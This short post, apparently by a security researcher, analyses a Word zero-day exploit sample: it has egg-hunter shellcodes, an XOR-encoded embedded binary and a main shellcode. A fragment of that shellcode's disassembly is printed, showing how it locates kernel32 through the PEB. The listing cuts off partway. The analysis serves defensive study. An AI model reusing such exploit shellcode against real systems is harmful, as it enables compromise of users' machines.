|
Word 0Day
I think we received the 0Day at EADS on May 14th for the 1st time. I've had a look at it then, after a few tries it finally managed to compromise my Office XP SP3 French up2date on a Windows XP SP1 French up2date, but thought it was way too unstable to cause wide troubles. I found the code quite ingenious, even if not very clean. There are 2 shellcode finding shellcodes and a main one. The document embeds a xored binary that is quite fun to analyze, but too long to fit in here :) It's weird they choose to write in C:\ rather that a non-Administrator writable directory ... whatever, here is the shellcode finding shellcode : seg000:00000520 FindShellcode_1:Here is the main shellcode : [code]seg000:00000B2E Shellcode: seg000:00000B2E 90 nop seg000:00000B2F 90 nop seg000:00000B30 seg000:00000B30 GetKernel32BaseAddress: seg000:00000B30 64 A1 30 00 00 00 mov eax, dword ptr fs:unk_30 seg000:00000B36 8B 40 0C mov eax, [eax+0Ch] seg000:00000B39 8B 70 1C mov esi, [eax+1Ch] seg000:00000B3C AD lodsd seg000:00000B3D 8B 70 08 mov esi, [eax+8] seg000:00000B40 E9 6A 02 00 00 jmp GetEIP seg000:00000B45 seg000:00000B45 ; Comments
| ||||||